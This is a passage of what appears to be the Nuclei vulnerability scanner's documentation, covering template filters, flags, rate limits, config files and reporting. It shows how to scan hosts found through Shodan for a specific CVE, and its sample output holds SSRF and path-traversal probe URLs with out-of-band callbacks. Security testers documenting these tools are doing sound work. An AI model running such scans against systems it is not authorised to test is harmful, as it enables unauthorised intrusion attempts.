nuclei -u https://example.com -t github/private-repo
```
You can also directly run a template from any ProjectDiscovery Cloud Platform URL like this:
```sh
nuclei -u https://example.com -t https://cloud.projectdiscovery.io/public/tech-detect
```
### Executing Template Workflows
`-w/workflows`
[Workflows](/templates/workflows/overview) can be executed using the following command:
```sh
nuclei -u https://example.com -w workflows/
```
Similarly, Workflows can be executed against a list of URLs.
```sh
nuclei -list http_urls.txt -w workflows/wordpress-workflow.yaml
```
## Types of Templates
### Template **Filters**
Nuclei engine supports three basic filters to customize template execution.
1. Tags (`-tags`)
Filter based on tags field available in the template.
2. Severity (`-severity`)
Filter based on severity field available in the template.
3. Author (`-author`)
Filter based on author field available in the template.
As default, Filters are applied on installed path of templates and can be customized with manual template path input.
For example, below command will run all the templates installed at `~/nuclei-templates/` directory and has `cve` tags in it.
```sh
nuclei -u https://example.com -tags cve
```
And this example will run all the templates available under `~/nuclei-templates/exposures/` directory and has `config` tag in it.
```sh
nuclei -u https://example.com -tags config -t exposures/
```
Multiple filters works together with AND condition,
below example runs all templates with `cve` tags
AND has `critical` OR `high` severity AND `geeknik` as author of template.
```sh
nuclei -u https://example.com -tags cve -severity critical,high -author geeknik
```
### Advanced Filters
Multiple filters can also be combined using the template condition flag (`-tc`) that allows complex expressions like the following ones:
```sh
nuclei -tc "contains(id,'xss') || contains(tags,'xss')"
nuclei -tc "contains(tags,'cve') && contains(tags,'ssrf')"
nuclei -tc "contains(name, 'Local File Inclusion')"
```
The supported fields are:
* `id` string
* `name` string
* `description` string
* `tags` slice of strings
* `authors` slice of strings
* `severity` string
* `protocol` string
* `http_method` slice of strings
* `body` string (containing all request bodies if any)
* `matcher_type` slice of string
* `extractor_type` slice of string
* `description` string
Also, every key-value pair from the template metadata section is accessible. All fields can be combined with logical operators (`||` and `&&`) and used with DSL helper functions.
Similarly, all filters are supported in workflows as well.
```sh
nuclei -w workflows/wordpress-workflow.yaml -severity critical,high -list http_urls.txt
```
**Workflows**
In Workflows, Nuclei filters are applied on templates or sub-templates running via workflows, not on the workflows itself.
### Public Templates
Nuclei has built-in support for automatic template download/update from [**nuclei templates**](https://github.com/projectdiscovery/nuclei-templates) project which provides [community-contributed](https://github.com/projectdiscovery/nuclei-templates#-community) list of ready-to-use templates that is constantly updated.
Nuclei checks for new community template releases upon each execution and automatically downloads the latest version when available. optionally, this feature can be disabled using the `-duc` cli flag or the configuration file.
### Custom Templates
Users can create custom templates on a personal public / private GitHub / AWS Bucket that they wish to run / update while using nuclei from any environment without manually downloading the GitHub repository everywhere.
To use this feature, users need to set the following environment variables:
```bash
export GITHUB_TOKEN=gh_XXX
export GITHUB_TEMPLATE_REPO=my_nuclei_template
```
```bash
export GITLAB_SERVER_URL=https://gitlab.com
# The GitLab token must have the read_api and read_repository scope
export GITLAB_TOKEN=XXXXXXXXXX
# Comma separated list of repository IDs (not names)
export GITLAB_REPOSITORY_IDS=12345,67890
```
```bash
export AWS_ACCESS_KEY=AKIAXXXXXXXX
export AWS_SECRET_KEY=XXXXXX
export AWS_REGION=us-xxx-1
export AWS_TEMPLATE_BUCKET=aws_bucket_name
```
```bash
export AZURE_TENANT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_SECRET=00000000-0000-0000-0000-000000000000
export AZURE_SERVICE_URL=https://XXXXXXXXXX.blob.core.windows.net/
export AZURE_CONTAINER_NAME=templates
```
Environment variables can also be provided to disable download from default and custom template locations:
```bash
# Disable download from the default nuclei-templates project
export DISABLE_NUCLEI_TEMPLATES_PUBLIC_DOWNLOAD=true
# Disable download from public / private GitHub project(s)
export DISABLE_NUCLEI_TEMPLATES_GITHUB_DOWNLOAD=true
# Disable download from public / private GitLab project(s)
export DISABLE_NUCLEI_TEMPLATES_GITLAB_DOWNLOAD=true
# Disable download from public / private AWS Bucket(s)
export DISABLE_NUCLEI_TEMPLATES_AWS_DOWNLOAD=true
# Disable download from public / private Azure Blob Storage
export DISABLE_NUCLEI_TEMPLATES_AZURE_DOWNLOAD=true
```
Once the environment variables are set, following command to download the custom templates:
```bash
nuclei -update-templates
```
This command will clone the repository containing the custom templates to the default nuclei templates directory (`$HOME/nuclei-templates/github/`).
The directory structure of the custom templates looks as follows:
```bash
tree $HOME/nuclei-templates/
nuclei-templates/
└── github/$GH_REPO_NAME # Custom templates downloaded from public / private GitHub project
└── gitlab/$GL_REPO_NAME # Custom templates downloaded from public / private GitLab project
└── s3/$BUCKET_NAME # Custom templates downloaded from public / private AWS Bucket
└── azure/$CONTAINER_NAME # Custom templates downloaded from public / private Azure Blob Storage
```
Users can then use the custom templates with the `-t` flag as follows:
```
nuclei -t github/my_custom_template -u https://example.com
```
The nuclei engine can be updated to latest version by using the `-update` flag.
Writing your own unique templates will always keep you one step ahead of
others.
### AI-Powered Template Generation
`-ai`
Nuclei supports generating and running templates on-the-fly using AI capabilities powered by the ProjectDiscovery API. This feature allows you to perform quick, targeted scans without needing pre-written templates by describing what you want to detect in natural language.
**Prerequisites:**
1. A ProjectDiscovery API key (Get one at [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io))
2. Configure your API key using one of these methods:
**Method 1: Using CLI (Recommended)**
```bash
nuclei -auth
# Enter your API key when prompted
```
**Method 2: Environment Variable**
```bash
export PDCP_API_KEY=your_api_key_here
```
**Basic Usage:**
1. **Finding Sensitive Information Leaks:**
```bash
nuclei -list targets.txt -ai "Find admin_api_key in response"
```
2. **Detecting Debug Information:**
```bash
nuclei -list targets.txt -ai "Detect exposed stack traces in error messages"
```
3. **Discovering Admin Interfaces:**
```bash
nuclei -list targets.txt -ai "Find admin login endpoints"
```
4. **Identifying Exposed Secrets:**
```bash
nuclei -list urls.txt -ai "Detect secrets in response"
```
5. **Extract Page Titles**
```bash
nuclei -list targets.txt -ai "Extract page titles"
```
The `-ai` flag requires an active internet connection to communicate with the ProjectDiscovery API. Generated templates are stored both locally on your computer and in your ProjectDiscovery cloud account for future reference. For privacy, your prompts and generated templates are not used for AI training.
Currently, each user is limited to 100 AI template generation queries per day. This limit is subject to change based on usage patterns and to prevent abuse.
### Nuclei Flags
```
nuclei -h
```
This will display help for the tool. Here are all the switches it supports.
```console
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with dns record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
-sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable
-code enable loading code protocol-based templates
-dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature
FILTERING:
-a, -author string[] templates to run based on authors (comma-separated, file)
-tags string[] templates to run based on tags (comma-separated, file)
-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)
-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration
-id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)
-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)
-it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration
-et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)
-em, -exclude-matchers string[] template matchers to exclude in result
-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown
-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown
-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-tc, -template-condition string[] templates to run based on expression condition
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-j, -jsonl write output in JSONL(ines) format
-irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)
-or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)
-ot, -omit-template omit encoded template in the JSON, JSONL output
-nm, -no-meta disable printing result metadata in cli output
-ts, -timestamp enables printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
-je, -json-export string file to export results in JSON format
-jle, -jsonl-export string file to export results in JSONL(ine) format
CONFIGURATIONS:
-config string path to the nuclei configuration file
-fr, -follow-redirects enable following redirects for http templates
-fhr, -follow-host-redirects follow redirects on the same host
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
-dr, -disable-redirects disable redirects for http templates
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
-V, -var value custom vars in key=value format
-r, -resolvers string file containing resolver list for nuclei
-sr, -system-resolvers use system DNS resolving as error fallback
-dc, -disable-clustering disable clustering of requests
-passive enable passive HTTP response processing mode
-fh2, -force-http2 force http2 connection on requests
-ev, -env-vars enable environment variables to be used in template
-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts
-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts
-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts
-sml, -show-match-line show match lines for file templates, works with extractors only
-ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default
-sni string tls sni hostname to use (default: input domain name)
-dt, -dialer-timeout value timeout for network requests.
-dka, -dialer-keep-alive value keep-alive duration for network requests.
-lfa, -allow-local-file-access allows file (payload) access anywhere on the system
-lna, -restrict-local-network-access blocks connections to the local / private network
-i, -interface string network interface to use for network scan
-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)
-sip, -source-ip string source ip address to use for network scan
-rsr, -response-size-read int max response size to read in bytes (default 10485760)
-rss, -response-size-save int max response size to read in bytes (default 1048576)
-reset reset removes all nuclei configuration and data files (including nuclei-templates)
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
INTERACTSH:
-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)
-itoken, -interactsh-token string authentication token for self-hosted interactsh server
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates
FUZZING:
-ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)
-fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)
-fuzz enable loading fuzzing templates
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 25)
-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)
-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)
-jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)
-pc, -payload-concurrency int max payload concurrency for each template (default 25)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 10)
-retries int number of times to retry a failed request (default 1)
-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)
-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)
-te, -track-error string[] adds given error to max-host-error watchlist (standard, file)
-nmhe, -no-mhe disable skipping host from scan based on errors
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path
-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)
-stream stream mode - start elaborating without sorting the input
-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-nh, -no-httpx disable httpx probing for non-url input
-no-stdin disable stdin processing
HEADLESS:
-headless enable templates that require headless browser support (root user on Linux will disable sandbox)
-page-timeout int seconds to wait for each page in headless mode (default 20)
-sb, -show-browser show the browser on the screen when running templates with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-sc, -system-chrome use local installed Chrome browser instead of nuclei installed
-lha, -list-headless-action list available headless actions
DEBUG:
-debug show all requests and responses
-dreq, -debug-req show all sent requests
-dresp, -debug-resp show all received responses
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-pi, -proxy-internal proxy all internal requests
-ldf, -list-dsl-function list all supported DSL function signatures
-tlog, -trace-log string file to write sent requests trace log
-elog, -error-log string file to write sent requests error log
-version show nuclei version
-hm, -hang-monitor enable nuclei hang monitoring
-v, -verbose show verbose output
-profile-mem string optional nuclei memory profile dump file
-vv display templates loaded for scan
-svd, -show-var-dump show variables dump for debugging
-ep, -enable-pprof enable pprof debugging server
-tv, -templates-version shows the version of the installed nuclei-templates
-hc, -health-check run diagnostic check up
UPDATE:
-up, -update update nuclei engine to the latest released version
-ut, -update-templates update nuclei-templates to latest released version
-ud, -update-template-dir string custom directory to install / update nuclei-templates
-duc, -disable-update-check disable automatic nuclei/templates update check
STATISTICS:
-stats display statistics about the running scan
-sj, -stats-json display statistics in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-cup, -cloud-upload upload scan results to pdcp dashboard
-sid, -scan-id string upload scan results to given scan id
AUTHENTICATION:
-sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan
-ps, -prefetch-secrets prefetch secrets from the secrets file
```
From Nuclei v3.0.0 `-metrics` port has been removed and merged with `-stats`
when using `-stats` flag metrics will be by default available at `localhost:9092/metrics`
and metrics-port can be configured by `-metrics-port` flag
### Rate **Limits**
Nuclei have multiple rate limit controls for multiple factors, including a number of templates to execute in parallel, a number of hosts to be scanned in parallel for each template, and the global number of request / per second you wanted to make/limit using nuclei, here is an example of each flag with description.
| Flag | Description |
| ---------- | -------------------------------------------------------------------- |
| rate-limit | Control the total number of request to send per seconds |
| bulk-size | Control the number of hosts to process in parallel for each template |
| c | Control the number of templates to process in parallel |
Feel free to play with these flags to tune your nuclei scan speed and accuracy. For more details on tuning these flag, you can refer [mass-scanning-cli](/tools/nuclei/mass-scanning-cli)
`rate-limit` flag takes precedence over the other two flags, the number of
requests/seconds can't go beyond the value defined for `rate-limit` flag
regardless the value of `c` and `bulk-size` flag.
### Traffic **Tagging**
Many BugBounty platform/programs requires you to identify the HTTP traffic you make, this can be achieved by setting custom header using config file at `$HOME/.config/nuclei/config.yaml` or CLI flag `-H / header`
Setting custom header using config file
```yaml
# Headers to include with each request.
header:
- 'X-BugBounty-Hacker: h1/geekboy'
- 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei'
```
Setting custom header using CLI flag
```yaml
nuclei -header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei' -list urls.txt -tags cves
```
### Template **Exclusion**
Nuclei supports a variety of methods for excluding / blocking templates from execution. By default, **nuclei** excludes the tags/templates listed below from execution to avoid unexpected fuzz based scans and some that are not supposed to run for mass scan, and these can be easily overwritten with nuclei configuration file / flags.
Nuclei engine supports two ways to manually exclude templates from scan,
1. Exclude Templates (`-exclude-templates/exclude`)
**exclude-templates** flag is used to exclude single or multiple templates and directory, multiple `-exclude-templates` flag can be used to provide multiple values.
2. Exclude Tags (`-exclude-tags/etags`)
**exclude-tags** flag is used to exclude templates based in defined tags, single or multiple can be used to exclude templates.
Example of excluding single template
```
nuclei -list urls.txt -t cves/ -exclude-templates cves/2020/CVE-2020-XXXX.yaml
```
Example of multiple template exclusion
```
nuclei -list urls.txt -exclude-templates exposed-panels/ -exclude-templates technologies/
```
Example of excluding templates with single tag
```
nuclei -l urls.txt -t cves/ -etags xss
```
Example of excluding templates with multiple tags
```
nuclei -l urls.txt -t cves/ -etags sqli,rce
```
* [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) list - default list of tags and templates excluded from nuclei scan as default.
**.nuclei-ignore** file is not supposed to be modified by
user, as it gets used by nuclei internally, to overwrite ignore list, utilize [nuclei
configuration](/tools/nuclei/running#nuclei-config) file.
To prioritize certain templates or tags over the [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) file or denylist, you must use the `-include-templates` or `-include-tags` flags. This will ensure that the specified templates or tags take precedence over any `.nuclei-ignore` or denylist entries.
Example of running blocked templates
```bash
nuclei -l urls.txt -include-tags iot,misc,fuzz
```
Example of executing a specific template that is in the denylist
Say that you have custom templates globbed (`*`) in the denylist on the Nuclei configuration file.
```yaml
# ...
exclude-templates:
- 'custom/**/*.yaml'
```
But you just want to execute a specific template.
```bash
nuclei -l urls.txt -include-templates custom/specific-template.yaml
```
### List Template Path
`-tl` option in Nuclei is used to list the paths of templates, rather than executing them. This can help you inspect which templates would be used for scan given your current template filter.
```sh
# Command to list templates (-tl)
nuclei -tags cve -severity critical,high -author geeknik -tl
```
### Scan on internet database
Nuclei supports integration with [uncover module](https://github.com/projectdiscovery/uncover) that supports services like Shodan, Censys, Hunter, Zoomeye, many more to execute Nuclei on these databases.
Here are uncover options to use -
```console
nuclei -h uncover
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ucd, -uncover-delay int delay between uncover query requests in seconds (0 to disable) (default 1)
```
You need to set the API key of the engine you are using as an environment variable in your shell.
```
export SHODAN_API_KEY=xxx
export CENSYS_API_ID=xxx
export CENSYS_API_SECRET=xxx
export FOFA_EMAIL=xxx
export FOFA_KEY=xxx
export QUAKE_TOKEN=xxx
export HUNTER_API_KEY=xxx
export ZOOMEYE_API_KEY=xxx
```
Required API keys can be obtained by signing up on following platform [Shodan](https://account.shodan.io/register), [Censys](https://censys.io/register), [Fofa](https://fofa.info/toLogin), [Quake](https://quake.360.net/quake/#/index), [Hunter](https://user.skyeye.qianxin.com/user/register?next=https%3A//hunter.qianxin.com/api/uLogin\&fromLogin=1) and [ZoomEye](https://www.zoomeye.org/login) .
Example of template execution using a search query.
```
export SHODAN_API_KEY=xxx
nuclei -id 'CVE-2021-26855' -uq 'vuln:CVE-2021-26855' -ue shodan
```
It can also read queries from templates metadata and execute template against hosts returned by uncover for that query.
Example of template execution using template-defined search queries.
Template snippet of [CVE-2021-26855](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-26855.yaml)
```yaml
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
```console
nuclei -t cves/2021/CVE-2021-26855.yaml -uncover
nuclei -tags cve -uncover
```
We can update the nuclei configuration file to include these tags for all scans.
## Nuclei **Config**
> Since release of [v2.3.2](https://blog.projectdiscovery.io/nuclei-v2-3-0-release/) nuclei uses [goflags](https://github.com/projectdiscovery/goflags) for clean CLI experience and long/short formatted flags.
>
> [goflags](https://github.com/projectdiscovery/goflags) comes with auto-generated config file support that coverts all available CLI flags into config file, basically you can define all CLI flags into config file to avoid repetitive CLI flags that loads as default for every scan of nuclei.
>
> Default path of nuclei config file is `$HOME/.config/nuclei/config.yaml`, uncomment and configure the flags you wish to run as default.
Here is an example config file:
```yaml
# Headers to include with all HTTP request
header:
- 'X-BugBounty-Hacker: h1/geekboy'
# Directory based template execution
templates:
- cves/
- vulnerabilities/
- misconfiguration/
# Tags based template execution
tags: exposures,cve
# Template Filters
tags: exposures,cve
author: geeknik,pikpikcu,dhiyaneshdk
severity: critical,high,medium
# Template Allowlist
#
# Note: This will take precedence over the .nuclei-ignore file and denylist
# entries (exclude-tags or exclude-templates list).
include-tags: dos,fuzz # Tag based inclusion
include-templates: # Template based inclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Template Denylist
exclude-tags: info # Tag based exclusion
exclude-templates: # Template based exclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Rate Limit configuration
rate-limit: 500
bulk-size: 50
concurrency: 50
```
Once configured, **config file be used as default**, additionally custom config file can be also provided using `-config` flag.
**Running nuclei with custom config file**
```
nuclei -config project.yaml -list urls.txt
```
## Nuclei Result Dashboard
Nuclei now allows seamless integration with the ProjectDiscovery Cloud Platform to simplify the visualization of Nuclei results and generate swift reports. This highly requested feature from the community enables easier handling of scan results with minimal effort.
Follow the steps below to set up your PDCP Result Dashboard:
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) to create free PDCP API key.
2. Use the `nuclei -auth` command, enter your API key when prompted.
3. To perform a scan and upload the results straight to the cloud, use the `-cloud-upload` option while running a nuclei scan.
An example command might look like this:
```bash
nuclei -target http://honey.scanme.sh -cloud-upload
```
And the output would be like this:
```console
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.0
projectdiscovery.io
[INF] Current nuclei version: v3.1.0 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 71
[INF] Executing 71 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2017-9506] [http] [medium] http://honey.scanme.sh/plugins/servlet/oauth/users/icon-uri?consumerUri=http://clk37fcdiuf176s376hgjzo3xsoq5bdad.oast.live
[CVE-2019-9978] [http] [medium] http://honey.scanme.sh/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://clk37fcdiuf176s376hgyk9ppdqe9a83z.oast.live
[CVE-2019-8451] [http] [medium] http://honey.scanme.sh/plugins/servlet/gadgets/makeRequest
[CVE-2015-8813] [http] [high] http://honey.scanme.sh/Umbraco/feedproxy.aspx?url=http://clk37fcdiuf176s376hgj885caqoc713k.oast.live
[CVE-2020-24148] [http] [critical] http://honey.scanme.sh/wp-admin/admin-ajax.php?action=moove_read_xml
[CVE-2020-5775] [http] [medium] http://honey.scanme.sh/external_content/retrieve/oembed?endpoint=http://clk37fcdiuf176s376hgyyxa48ih7jep5.oast.live&url=foo
[CVE-2020-7796] [http] [critical] http://honey.scanme.sh/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://clk37fcdiuf176s376hgi9b8sd33se5sr.oast.live%23
[CVE-2017-18638] [http] [high] http://honey.scanme.sh/composer/send_email?to=hVsp@XOvw&url=http://clk37fcdiuf176s376hgyf8y81i9oju3e.oast.live
[CVE-2018-15517] [http] [high] http://honey.scanme.sh/index.php/System/MailConnect/host/clk37fcdiuf176s376hgi5j3fsht3dchj.oast.live/port/80/secure/
[CVE-2021-45967] [http] [critical] http://honey.scanme.sh/services/pluginscript/..;/..;/..;/getFavicon?host=clk37fcdiuf176s376hgh1y3xjzb3yjpy.oast.live
[CVE-2021-26855] [http] [critical] http://honey.scanme.sh/owa/auth/x.js
[INF] Scan results uploaded! View them at https://cloud.projectdiscovery.io/scans/clk37krsr14s73afc3ag
```
After the scan, a URL will be displayed on the command line interface. Visit this URL to check your results on the Cloud Dashboard.
### Advanced Integration Options
**Setting API key via environment variable**
Avoid entering your API key via interactive prompt by setting it via environment variable.
```sh
export PDCP_API_KEY=XXXX-XXXX
```
**Enabling result upload by default**
If you want all your scans to automatically upload results to the cloud, enable the `ENABLE_CLOUD_UPLOAD` environment variable.
```sh
export ENABLE_CLOUD_UPLOAD=true
```
**Disabling cloud upload warnings**
To suppress warnings about result uploads, disable the `DISABLE_CLOUD_UPLOAD_WRN` environment variable.
```sh
export DISABLE_CLOUD_UPLOAD_WRN=true
```
Your configured PDCP API key stored in `$HOME/.pdcp/credentials.yaml`
Nuclei OSS results uploaded to the cloud platform are scheduled for automatic cleanup after 30 days, although this duration is subject to change as we gauge user feedback and requirement.
## Nuclei Reporting
Nuclei comes with reporting module support with the release of v2.3.0 supporting GitHub, GitLab, and Jira integration, this allows nuclei engine to create automatic tickets on the supported platform based on found results.
| Platform | GitHub | GitLab | Jira | Markdown | SARIF | Elasticsearch | Splunk HEC | MongoDB |
| -------- | :----: | :----: | :--: | :------: | :---: | :-----------: | :--------: | :-----: |
| Support | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ |
`-rc, -report-config` flag can be used to provide a config file to read configuration details of the platform to integrate. Here is an [example config file](https://github.com/projectdiscovery/nuclei/blob/main/cmd/nuclei/issue-tracker-config.yaml) for all supported platforms.
For example, to create tickets on GitHub, create a config file with the following content and replace the appropriate values:
```yaml
# GitHub contains configuration options for GitHub issue tracker
github:
username: '$user'
owner: '$user'
token: '$token'
project-name: 'testing-project'
issue-label: 'Nuclei'
duplicate-issue-check: true
```
Alternatively if you use GitLab, create a config file following content and replace the appropriate values:
```yaml
# GitLab contains configuration options for GitLab issue tracker
gitlab:
username: '$user'
base-url: 'gitlab.com'
token: '$token'
project-name: 'testing-project'
issue-label: 'nuclei-label'
severity-as-label: true
duplicate-issue-check: true
```
To store results in Elasticsearch, create a config file with the following content and replace the appropriate values:
```yaml
# elasticsearch contains configuration options for elasticsearch exporter
elasticsearch:
# IP for elasticsearch instance
ip: 127.0.0.1
# Port is the port of elasticsearch instance
port: 9200
# IndexName is the name of the elasticsearch index
index-name: nuclei
```
To forward results to Splunk HEC, create a config file with the following content and replace the appropriate values:
```yaml
# splunkhec contains configuration options for splunkhec exporter
splunkhec:
# Hostname for splunkhec instance
host: '$hec_host'
# Port is the port of splunkhec instance
port: 8088
# IndexName is the name of the splunkhec index
index-name: nuclei
# SSL enables ssl for splunkhec connection
ssl: true
# SSLVerification disables SSL verification for splunkhec
ssl-verification: true
# HEC Token for the splunkhec instance
token: '$hec_token'
```
To forward results to Jira, create a config file with the following content and replace the appropriate values:
The Jira reporting options allows for custom fields, as well as using variables from the Nuclei templates in those custom fields.
The supported variables currently are: `$CVSSMetrics`, `$CVEID`, `$CWEID`, `$Host`, `$Severity`, `$CVSSScore`, `$Name`
In addition, Jira is strict when it comes to custom field entry. If the field is a dropdown, Jira accepts only the case sensitive specific string and the API call is slightly different. To support this, there are three types of customfields.
* `name` is the dropdown value
* `id` is the ID value of the dropdown
* `freeform` is if the customfield the entry of any value
To avoid duplication, the JQL query run can be slightly modified by the config file.
The `CLOSED_STATUS` can be changed in the Jira template file using the `status-not` variable.
`summary ~ TEMPLATE_NAME AND summary ~ HOSTNAME AND status != CLOSED_STATUS`
```yaml
jira:
# cloud is the boolean which tells if Jira instance is running in the cloud or on-prem version is used
cloud: true
# update-existing is the boolean which tells if the existing, opened issue should be updated or new one should be created
update-existing: false
# URL is the jira application url
url: https://localhost/jira
# account-id is the account-id of the Jira user or username in case of on-prem Jira
account-id: test-account-id
# email is the email of the user for Jira instance
email: test@test.com
# token is the token for Jira instance or password in case of on-prem Jira
token: test-token
#project-name is the name of the project.
project-name: test-project-name
#issue-type is the name of the created issue type (case sensitive)
issue-type: Bug
# SeverityAsLabel (optional) sends the severity as the label of the created issue
# User custom fields for Jira Cloud instead
severity-as-label: true
# Whatever your final status is that you want to use as a closed ticket - Closed, Done, Remediated, etc
# When checking for duplicates, the JQL query will filter out status's that match this.
# If it finds a match _and_ the ticket does have this status, a new one will be created.
status-not: Closed
# Customfield supports name, id and freeform. name and id are to be used when the custom field is a dropdown.
# freeform can be used if the custom field is just a text entry
# Variables can be used to pull various pieces of data from the finding itself.
# Supported variables: $CVSSMetrics, $CVEID, $CWEID, $Host, $Severity, $CVSSScore, $Name
custom_fields:
customfield_00001:
name: 'Nuclei'
customfield_00002:
